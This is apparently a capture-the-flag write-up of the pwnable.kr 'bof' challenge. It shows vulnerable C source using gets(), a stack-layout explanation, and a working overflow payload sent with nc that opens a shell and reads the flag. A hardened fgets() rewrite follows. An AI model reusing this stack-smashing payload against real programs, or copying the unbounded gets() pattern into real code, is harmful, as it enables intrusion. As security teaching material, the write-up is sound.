Nana told me that buffer overflow is one of the most common software vulnerabilities.
Is that true?

The challenge provides the C source:

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme); // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
```

The only thing we control is the input read into overflowme, so we have to use the buffer overflow to overwrite the value of key so that the `key == 0xcafebabe` check succeeds.

Loading it into IDA Pro and looking at func:
[Figure: IDA Pro disassembly of func]

Based on the assembly, I drew this stack diagram to help me understand the layout:
[Figure: stack layout of func]

Although overflowme is only allocated 32 bytes, gets() puts no limit on the input length. Between -0x2C (overflowme) and 0x08 (key) there are 52 bytes in total; once that region is filled, the following bytes overwrite key at 0x08 with the value we want. The payload is built as follows (note the little-endian byte order):

```shell
$ (python -c 'print "a" * 52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :)
```
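For the defensive side, here is an added example (my own code, not part of the challenge or the original write-up) showing how func() would look with the gets() call replaced by a bounded fgets() read; the helper names read_line_bounded, func_safe and run_with_input are invented for this note. With the read bounded to sizeof overflowme, the 52-byte filler plus 0xcafebabe payload above is simply truncated and key is never reachable from the input.

```c
/* Added example: hardened rewrite of the challenge's func(). Helper names
 * (read_line_bounded, func_safe, run_with_input) are invented for this note. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32

/* Read one line into dst, writing at most cap-1 characters plus a NUL.
 * Returns the stored length, or -1 if the line did not fit (the rest of
 * that line is drained so it cannot be consumed as a later "input"). */
static int read_line_bounded(char *dst, size_t cap, FILE *in) {
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) {
        if (cap) dst[0] = '\0';
        return -1;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {   /* the whole line fit */
        dst[--len] = '\0';
        return (int)len;
    }
    int c = fgetc(in);
    if (c == EOF) return (int)len;           /* last line without newline: it fit */
    while (c != EOF && c != '\n') c = fgetc(in);   /* drain the overlong remainder */
    return -1;
}

/* Same logic as func(), but the read is bounded. Returns 1 if the shell
 * branch would be taken, 0 otherwise (key is unsigned here; the original uses int). */
static int func_safe(unsigned int key, FILE *in) {
    char overflowme[BUF_SIZE];
    if (read_line_bounded(overflowme, sizeof overflowme, in) < 0)
        printf("input longer than %d bytes was truncated\n", BUF_SIZE - 1);
    return key == 0xcafebabe;
}

/* Run func_safe() with key 0xdeadbeef over an in-memory input (tmpfile() is ISO C). */
static int run_with_input(const char *data, size_t len) {
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    if (fwrite(data, 1, len, in) != len) { fclose(in); return -1; }
    rewind(in);
    int r = func_safe(0xdeadbeef, in);
    fclose(in);
    return r;
}

int main(void) {
    /* Constructed input mirroring the write-up's payload: 52 filler bytes + 0xcafebabe LE. */
    char payload[56];
    memset(payload, 'a', 52);
    memcpy(payload + 52, "\xbe\xba\xfe\xca", 4);
    printf("shell branch taken: %d\n", run_with_input(payload, sizeof payload)); /* prints 0 */
    return 0;
}
```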